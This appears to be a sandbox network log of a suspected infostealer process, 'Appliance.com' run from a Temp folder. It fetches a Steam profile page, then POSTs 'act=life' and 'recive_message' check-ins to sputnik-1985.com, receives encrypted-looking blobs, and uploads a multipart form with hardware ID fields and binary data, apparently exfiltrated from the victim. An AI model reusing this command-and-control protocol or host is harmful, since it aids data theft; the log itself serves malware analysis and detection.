2025-01-10 11:06:23 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2025-01-10 11:06:23 UTC	16384	IN	Data Raw: 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f Data Ascii: ity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPO
2025-01-10 11:06:23 UTC	3768	IN	Data Raw: 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_
2025-01-10 11:06:23 UTC	495	IN	Data Raw: 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 Data Ascii: criber Agreement</a>  \|  <a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div clas

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	104.21.64.1	443	4504	C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 11:06:23 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sputnik-1985.com
2025-01-10 11:06:23 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-10 11:06:24 UTC	1123	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 11:06:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=53ua0h4em18mccaaf3so5siult; expires=Tue, 06 May 2025 04:53:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n2iMAD%2ByTEj%2B8fcxaO9RzGH4ffApZgvwLytxrWfb2cJSD87dGUXbLQ8BHK7qCH8njJkEmQ0RmYJOhrNs8R4xPHRrazZ%2BH2DZkKDk8jadoBK%2FxbKUls9xEGWFKR1M7cRKTRz9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc328b1816de95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1580&rtt_var=612&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=907&delivery_rate=1761158&cwnd=242&unsent_bytes=0&cid=3237b659a4b37b4d&ts=475&x=0"
2025-01-10 11:06:24 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-10 11:06:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	104.21.64.1	443	4504	C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 11:06:24 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 86 Host: sputnik-1985.com
2025-01-10 11:06:24 UTC	86	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--3fe7f419a360&j=b9abc76ce53b6fc3a03566f8f764f5ea
2025-01-10 11:06:25 UTC	1121	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 11:06:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jijhpse1ctf3lhrir8o7le4t7i; expires=Tue, 06 May 2025 04:53:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hS3CVgZ0umXHXIL3Rb9UT3%2B0shYffY9qUKr6SAEQb%2FfeNHTulbJjXLCtMTGMwrD6aoPdps54usPtjwWra%2BOwtBL48q1kW7dG06oIdEXmVnIN9FDOnBoq6A0FQFOC52q0Ou0N"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc32910c6ac358-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1652&rtt_var=650&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=986&delivery_rate=1645070&cwnd=155&unsent_bytes=0&cid=deaf32a0d1855a41&ts=476&x=0"
2025-01-10 11:06:25 UTC	248	IN	Data Raw: 34 36 62 0d 0a 61 34 58 36 69 38 32 79 38 6f 77 32 6b 43 30 6e 49 42 45 33 79 56 45 46 73 53 4d 4e 4d 61 71 41 2b 61 45 7a 74 67 48 37 71 34 6f 51 70 34 79 70 39 34 62 65 72 6b 58 31 44 78 31 47 63 46 75 36 4e 43 6d 54 51 6d 6b 54 6b 4f 61 59 7a 55 44 54 4c 64 6e 64 35 30 6d 2f 6e 4f 71 68 77 5a 65 67 46 50 56 56 42 52 70 4b 54 4f 73 30 61 35 4d 5a 4c 31 54 41 34 70 6a 4e 55 64 64 71 6c 4e 76 6d 43 4f 32 57 37 4b 58 58 6b 65 68 58 2f 45 42 43 52 58 52 57 6f 7a 39 73 33 45 74 67 45 34 61 69 6e 4e 73 52 6a 43 4f 32 7a 76 34 4b 79 4a 76 34 70 70 43 50 6f 45 32 79 53 45 6b 43 4b 78 57 6f 4e 47 66 64 52 57 6c 61 77 75 69 52 78 56 44 53 61 34 76 43 37 41 50 74 6d 4f 2b 6b 33 5a 6a 38 57 76 5a 48 53 55 4e 2b 56 75 74 39 4a 39 52 5a 4c 77 75 Data Ascii: 46ba4X6i82y8ow2kC0nIBE3yVEFsSMNMaqA+aEztgH7q4oQp4yp94berkX1Dx1GcFu6NCmTQmkTkOaYzUDTLdnd50m/nOqhwZegFPVVBRpKTOs0a5MZL1TA4pjNUddqlNvmCO2W7KXXkehX/EBCRXRWoz9s3EtgE4ainNsRjCO2zv4KyJv4ppCPoE2ySEkCKxWoNGfdRWlawuiRxVDSa4vC7APtmO+k3Zj8WvZHSUN+Vut9J9RZLwu
2025-01-10 11:06:25 UTC	890	IN	Data Raw: 49 73 61 6e 41 51 4d 56 32 6c 4e 6e 75 53 66 6a 57 38 4f 2f 58 6e 4b 34 4d 73 6b 64 4a 54 48 5a 57 70 44 52 6d 30 31 4e 67 55 38 76 71 6b 38 64 62 32 32 79 57 78 2b 49 4f 37 35 48 75 6f 4e 65 59 36 46 76 78 44 77 73 43 64 45 33 72 61 79 66 7a 55 57 78 51 33 4f 2b 4b 67 30 36 61 65 74 6e 4f 35 45 6d 2f 32 4f 2b 68 30 5a 33 75 52 76 70 45 54 6b 64 68 58 71 49 2b 61 74 4e 4d 5a 56 7a 4c 34 70 7a 4a 57 39 74 70 6e 63 54 6c 44 2b 65 59 71 65 47 51 6c 2f 59 55 71 67 39 6d 52 32 4e 53 70 79 55 6c 36 51 46 77 48 64 47 69 6e 4d 38 52 6a 43 4f 52 7a 4f 73 4b 37 4a 66 71 70 39 75 43 37 6b 62 30 51 6b 42 51 64 56 43 6c 4f 57 54 42 53 32 46 56 79 2b 75 51 79 6c 54 54 5a 39 6d 48 71 41 37 2f 32 4c 48 76 38 5a 33 6c 57 50 68 59 52 51 4a 73 47 37 4a 7a 59 4e 38 42 4e 78 Data Ascii: IsanAQMV2lNnuSfjW8O/XnK4MskdJTHZWpDRm01NgU8vqk8db22yWx+IO75HuoNeY6FvxDwsCdE3rayfzUWxQ3O+Kg06aetnO5Em/2O+h0Z3uRvpETkdhXqI+atNMZVzL4pzJW9tpncTlD+eYqeGQl/YUqg9mR2NSpyUl6QFwHdGinM8RjCORzOsK7Jfqp9uC7kb0QkBQdVClOWTBS2FVy+uQylTTZ9mHqA7/2LHv8Z3lWPhYRQJsG7JzYN8BNx
2025-01-10 11:06:25 UTC	1369	IN	Data Raw: 33 65 61 31 0d 0a 77 61 64 31 47 65 52 50 58 72 49 4b 44 56 74 67 6a 77 59 6e 6d 42 4f 79 55 37 71 62 52 6b 2b 35 65 2f 45 42 50 53 6e 74 56 70 6a 4a 73 32 30 64 69 57 4d 66 74 6e 4d 74 53 32 47 61 55 79 71 68 48 70 35 2f 78 37 34 6a 51 79 31 72 78 58 6c 51 41 52 6c 61 6c 50 57 44 46 41 58 41 64 30 61 4b 63 7a 78 47 4d 49 35 50 4f 37 77 33 71 6b 75 71 72 31 4a 33 68 58 66 74 47 56 30 68 2f 57 37 6b 2b 62 64 5a 50 59 31 62 48 34 70 72 43 58 39 35 6f 32 59 65 6f 44 76 2f 59 73 65 2f 2f 6e 66 35 47 2b 45 52 55 41 45 5a 57 70 54 31 67 78 51 46 77 48 64 47 69 6e 4d 38 52 6a 43 4f 53 7a 2b 51 46 35 35 37 37 6f 64 2b 43 35 45 62 32 51 55 46 4f 66 56 79 6d 50 47 4c 42 52 57 39 42 79 65 65 63 7a 56 7a 47 5a 74 6d 48 71 41 37 2f 32 4c 48 76 36 71 54 70 52 4f 4e 49 Data Ascii: 3ea1wad1GeRPXrIKDVtgjwYnmBOyU7qbRk+5e/EBPSntVpjJs20diWMftnMtS2GaUyqhHp5/x74jQy1rxXlQARlalPWDFAXAd0aKczxGMI5PO7w3qkuqr1J3hXftGV0h/W7k+bdZPY1bH4prCX95o2YeoDv/Yse//nf5G+ERUAEZWpT1gxQFwHdGinM8RjCOSz+QF5577od+C5Eb2QUFOfVymPGLBRW9ByeeczVzGZtmHqA7/2LHv6qTpRONI
2025-01-10 11:06:25 UTC	1369	IN	Data Raw: 57 6f 49 6d 43 54 44 79 39 64 7a 75 4c 62 6d 30 66 45 64 4a 37 57 70 68 43 6e 6e 2b 58 76 69 4e 44 6b 52 76 64 42 51 55 68 32 55 61 63 35 5a 39 5a 54 5a 31 58 50 37 70 50 47 58 74 4a 6d 6c 4d 37 6a 43 76 57 4b 36 71 76 65 6e 4b 34 61 73 6b 68 64 41 69 73 56 6a 69 52 6b 77 30 64 73 45 39 65 73 67 6f 4e 57 32 43 50 42 69 65 67 48 36 35 50 75 70 4e 75 55 36 6c 54 2f 52 45 74 4d 65 6c 6d 6a 50 32 44 42 54 47 70 62 77 75 75 65 7a 31 7a 58 63 5a 72 49 71 45 65 6e 6e 2f 48 76 69 4e 44 4a 5a 38 56 73 42 56 30 39 54 4f 73 30 61 35 4d 5a 4c 31 4c 41 35 5a 58 48 51 39 70 78 6c 38 37 6f 44 2b 2b 51 37 71 50 65 6e 76 78 63 38 30 39 4c 54 58 74 63 72 7a 4a 6a 31 30 31 6f 45 34 61 69 6e 4e 73 52 6a 43 4f 78 79 76 49 54 70 62 62 69 72 39 65 41 2b 45 2b 79 55 41 74 62 4d Data Ascii: WoImCTDy9dzuLbm0fEdJ7WphCnn+XviNDkRvdBQUh2Uac5Z9ZTZ1XP7pPGXtJmlM7jCvWK6qvenK4askhdAisVjiRkw0dsE9esgoNW2CPBiegH65PupNuU6lT/REtMelmjP2DBTGpbwuuez1zXcZrIqEenn/HviNDJZ8VsBV09TOs0a5MZL1LA5ZXHQ9pxl87oD++Q7qPenvxc809LTXtcrzJj101oE4ainNsRjCOxyvITpbbir9eA+E+yUAtbM
2025-01-10 11:06:25 UTC	1369	IN	Data Raw: 34 6e 56 67 76 56 4d 53 69 77 34 4e 63 78 6d 4b 63 32 2b 77 47 37 49 72 69 71 64 43 56 2f 46 50 2b 52 55 70 42 65 31 69 6f 4f 33 58 54 54 47 39 42 32 75 53 51 7a 52 47 61 49 35 37 52 71 46 47 6e 71 66 36 6b 6b 49 2b 67 54 62 4a 49 53 51 49 72 46 61 67 35 61 74 31 54 61 31 58 44 34 5a 58 4c 56 4e 78 6e 6b 38 54 6e 41 75 32 52 34 61 2f 66 6c 65 5a 66 39 45 46 45 52 48 39 59 36 33 30 6e 31 46 6b 76 43 34 6a 46 67 63 35 58 77 33 4b 73 7a 75 68 59 70 34 65 6e 74 70 43 58 34 68 53 71 44 30 68 4f 65 56 69 75 4e 32 2f 55 51 6d 35 66 7a 4f 2b 57 78 31 6a 51 5a 6f 76 62 37 67 66 6e 6c 2b 65 67 33 49 4c 67 55 66 4a 44 42 51 77 7a 55 72 4e 7a 50 35 4e 77 65 46 4f 49 2f 64 58 61 45 64 4e 76 32 5a 47 6f 42 75 71 4b 35 61 44 51 6b 65 31 51 2b 55 68 44 52 48 4a 57 72 6a Data Ascii: 4nVgvVMSiw4NcxmKc2+wG7IriqdCV/FP+RUpBe1ioO3XTTG9B2uSQzRGaI57RqFGnqf6kkI+gTbJISQIrFag5at1Ta1XD4ZXLVNxnk8TnAu2R4a/fleZf9EFERH9Y630n1FkvC4jFgc5Xw3KszuhYp4entpCX4hSqD0hOeViuN2/UQm5fzO+Wx1jQZovb7gfnl+eg3ILgUfJDBQwzUrNzP5NweFOI/dXaEdNv2ZGoBuqK5aDQke1Q+UhDRHJWrj
2025-01-10 11:06:25 UTC	1369	IN	Data Raw: 4c 77 75 49 36 5a 50 4d 51 39 46 71 6b 63 33 68 43 65 4f 53 35 4b 6a 51 6c 65 4e 52 39 6b 46 42 52 58 4e 5a 70 44 52 76 33 45 56 76 58 49 69 73 32 38 52 4a 6c 44 76 5a 36 65 4d 66 78 70 62 69 76 5a 43 50 6f 45 32 79 53 45 6b 43 4b 78 57 6c 4f 6d 62 62 54 32 4e 62 7a 50 43 62 79 46 6a 62 59 70 62 4a 36 77 6a 74 6b 50 75 70 30 4a 76 6d 55 2f 70 4c 53 31 42 79 57 75 74 39 4a 39 52 5a 4c 77 75 49 30 34 33 45 56 74 73 68 73 4d 37 7a 43 4f 32 62 34 71 4f 51 6a 36 42 4e 73 6b 68 4a 41 69 73 56 70 6a 39 71 31 31 4e 6a 55 38 6a 72 6e 4d 6c 44 32 32 79 55 79 75 67 4d 39 5a 6e 37 6f 4e 75 56 37 56 44 39 51 45 6c 4b 65 52 58 6c 63 32 44 4c 41 54 63 54 35 4f 47 4b 79 52 50 7a 65 59 2f 4f 35 42 6a 73 6c 65 58 76 7a 39 37 33 46 50 56 44 42 52 6f 7a 56 61 6f 2b 64 64 5a Data Ascii: LwuI6ZPMQ9Fqkc3hCeOS5KjQleNR9kFBRXNZpDRv3EVvXIis28RJlDvZ6eMfxpbivZCPoE2ySEkCKxWlOmbbT2NbzPCbyFjbYpbJ6wjtkPup0JvmU/pLS1ByWut9J9RZLwuI043EVtshsM7zCO2b4qOQj6BNskhJAisVpj9q11NjU8jrnMlD22yUyugM9Zn7oNuV7VD9QElKeRXlc2DLATcT5OGKyRPzeY/O5BjsleXvz973FPVDBRozVao+ddZ
2025-01-10 11:06:25 UTC	1369	IN	Data Raw: 71 4b 4b 78 45 43 55 4f 34 2f 5a 2f 77 37 34 31 76 44 76 31 35 79 75 44 4c 4a 45 53 6b 78 2b 58 71 38 36 59 74 74 43 61 6c 62 43 37 70 66 43 57 64 31 70 6e 4d 7a 75 41 2b 53 57 35 71 37 63 6c 4f 64 61 2b 77 38 4c 41 6e 52 4e 36 32 73 6e 35 56 46 6f 53 38 58 79 32 66 46 53 78 58 4b 4d 78 50 67 50 70 62 66 71 6f 39 4f 56 36 55 53 79 55 41 74 62 4d 31 4b 6e 63 7a 2b 54 51 57 74 66 79 2b 57 56 7a 46 7a 62 5a 4a 4c 47 34 67 66 31 6c 2b 79 6e 33 4a 6a 6a 52 76 68 46 56 30 74 36 57 4b 55 37 64 64 41 42 49 52 50 50 2b 74 75 62 45 65 5a 70 6d 73 58 2b 42 4f 6a 59 39 75 48 4a 30 4f 6c 59 73 68 63 46 55 47 46 56 6f 44 4e 67 33 56 4e 75 57 38 66 6f 6d 38 56 61 33 6d 43 51 7a 65 59 41 34 5a 6e 6b 72 74 47 51 36 31 54 37 58 55 67 43 50 52 57 73 4b 79 65 4c 41 56 68 66 Data Ascii: qKKxECUO4/Z/w741vDv15yuDLJESkx+Xq86YttCalbC7pfCWd1pnMzuA+SW5q7clOda+w8LAnRN62sn5VFoS8Xy2fFSxXKMxPgPpbfqo9OV6USyUAtbM1Kncz+TQWtfy+WVzFzbZJLG4gf1l+yn3JjjRvhFV0t6WKU7ddABIRPP+tubEeZpmsX+BOjY9uHJ0OlYshcFUGFVoDNg3VNuW8fom8Va3mCQzeYA4ZnkrtGQ61T7XUgCPRWsKyeLAVhf
2025-01-10 11:06:25 UTC	1369	IN	Data Raw: 73 42 6d 69 4f 64 32 4b 68 52 74 38 71 79 2b 6f 50 48 76 67 62 74 41 56 77 43 5a 52 58 7a 59 53 6d 54 55 79 38 4c 69 4b 57 59 30 55 50 53 59 49 2f 4b 72 7a 66 5a 75 4f 4b 6a 30 35 7a 76 55 37 49 42 42 55 30 7a 44 5a 4a 7a 5a 4d 46 54 49 45 4c 65 37 34 76 45 48 64 78 79 6c 4d 57 6f 52 36 66 55 37 61 54 63 6c 65 6c 45 76 56 31 56 53 58 39 44 35 7a 64 31 6b 77 38 76 51 73 50 74 69 63 31 57 6d 33 4b 50 78 50 67 4b 34 70 2b 6c 70 38 47 64 34 68 53 38 44 31 42 4a 66 31 4f 6d 4a 69 6a 43 56 32 78 46 7a 36 36 54 30 6c 7a 59 49 36 61 48 71 42 47 6e 77 4b 6d 61 30 35 37 67 55 2b 52 65 43 47 4a 34 57 61 67 2f 5a 74 51 42 49 52 50 4f 6f 73 4f 51 48 35 52 6e 69 49 6d 77 57 62 58 44 76 50 79 48 77 4c 78 4c 76 46 59 46 56 44 4d 4e 2b 58 30 6e 77 51 45 33 45 34 2f 68 69 Data Ascii: sBmiOd2KhRt8qy+oPHvgbtAVwCZRXzYSmTUy8LiKWY0UPSYI/KrzfZuOKj05zvU7IBBU0zDZJzZMFTIELe74vEHdxylMWoR6fU7aTclelEvV1VSX9D5zd1kw8vQsPtic1Wm3KPxPgK4p+lp8Gd4hS8D1BJf1OmJijCV2xFz66T0lzYI6aHqBGnwKma057gU+ReCGJ4Wag/ZtQBIRPOosOQH5RniImwWbXDvPyHwLxLvFYFVDMN+X0nwQE3E4/hi
2025-01-10 11:06:25 UTC	1369	IN	Data Raw: 74 6d 74 76 36 44 2b 53 4f 36 75 6a 75 72 73 74 5a 2f 30 70 4c 52 55 31 72 69 6a 6c 33 33 6b 35 6f 62 66 62 56 69 73 52 42 6c 6b 57 61 33 2b 74 4a 71 64 6a 78 37 34 6a 51 7a 31 37 69 51 6b 70 46 4d 78 76 72 4e 79 65 4c 41 55 70 65 78 65 65 56 78 42 50 31 61 59 6e 45 35 77 36 6e 31 71 6d 6a 6b 4d 69 75 56 66 68 66 53 45 31 30 47 61 77 70 59 4a 4d 50 4c 31 32 49 75 74 76 43 57 38 52 75 6c 73 36 6b 44 2b 6d 57 71 62 43 65 69 61 35 43 73 68 63 57 44 44 4e 48 36 32 73 6e 6c 45 39 69 55 73 76 73 6d 4e 46 44 30 6d 43 50 79 71 38 33 32 62 33 6b 6f 74 57 65 36 57 72 4d 62 6b 39 53 66 6c 71 73 63 55 66 55 56 32 78 74 39 74 57 4b 78 45 47 57 52 5a 72 66 36 30 6d 70 32 50 48 76 69 4e 44 50 58 75 4a 43 53 6b 55 78 64 61 77 6c 5a 4a 4d 50 4c 31 65 49 75 74 76 6d 58 4e Data Ascii: tmtv6D+SO6ujurstZ/0pLRU1rijl33k5obfbVisRBlkWa3+tJqdjx74jQz17iQkpFMxvrNyeLAUpexeeVxBP1aYnE5w6n1qmjkMiuVfhfSE10GawpYJMPL12IutvCW8Ruls6kD+mWqbCeia5CshcWDDNH62snlE9iUsvsmNFD0mCPyq832b3kotWe6WrMbk9SflqscUfUV2xt9tWKxEGWRZrf60mp2PHviNDPXuJCSkUxdawlZJMPL1eIutvmXN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	104.21.64.1	443	4504	C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 11:06:25 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=K7ZWZ85O1CBNYMQQ8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18164 Host: sputnik-1985.com
2025-01-10 11:06:25 UTC	15331	OUT	Data Raw: 2d 2d 4b 37 5a 57 5a 38 35 4f 31 43 42 4e 59 4d 51 51 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 32 39 31 37 35 38 46 35 46 43 34 39 41 38 44 45 39 45 32 46 30 44 36 34 42 33 42 34 38 42 41 0d 0a 2d 2d 4b 37 5a 57 5a 38 35 4f 31 43 42 4e 59 4d 51 51 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 37 5a 57 5a 38 35 4f 31 43 42 4e 59 4d 51 51 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 Data Ascii: --K7ZWZ85O1CBNYMQQ8Content-Disposition: form-data; name="hwid"0291758F5FC49A8DE9E2F0D64B3B48BA--K7ZWZ85O1CBNYMQQ8Content-Disposition: form-data; name="pid"2--K7ZWZ85O1CBNYMQQ8Content-Disposition: form-data; name="lid"HpOoIh--3fe7f419
2025-01-10 11:06:25 UTC	2833	OUT	Data Raw: cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b Data Ascii: xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{
